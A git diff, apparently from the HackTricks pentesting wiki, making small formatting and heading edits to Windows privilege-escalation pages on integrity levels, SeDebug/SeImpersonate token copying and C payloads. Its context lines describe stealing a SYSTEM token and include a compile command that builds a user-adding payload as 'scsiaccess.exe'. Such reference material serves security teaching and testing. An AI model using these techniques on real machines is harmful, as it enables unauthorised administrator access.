diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 40537a484..8e3120859 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -8,7 +8,7 @@ In Windows Vista and later versions, all protected items come with an **integrit
 
 A key rule is that objects can't be modified by processes with a lower integrity level than the object's level. The integrity levels are:
 
-- **Untrusted**: This level is for processes with anonymous logins. %%%Example: Chrome%%%
+- **Untrusted**: This level is for processes with anonymous logins. Example: Chrome
 - **Low**: Mainly for internet interactions, especially in Internet Explorer's Protected Mode, affecting associated files and processes, and certain folders like the **Temporary Internet Folder**. Low integrity processes face significant restrictions, including no registry write access and limited user profile write access.
 - **Medium**: The default level for most activities, assigned to standard users and objects without specific integrity levels. Even members of the Administrators group operate at this level by default.
 - **High**: Reserved for administrators, allowing them to modify objects at lower integrity levels, including those at the high level itself.
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 9ce74e175..598f52b32 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -1,3 +1,6 @@
+# SeDebug + SeImpersonate - Copy Token
+
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The following code **exploits the privileges SeDebug and SeImpersonate** to copy the token from a **process running as SYSTEM** and with **all the token privileges**. \
diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
index ca976e406..ed4168f60 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
@@ -1,6 +1,8 @@
+# Windows C Payloads
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# Add user
+## Add user
 
 ```c
 // i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c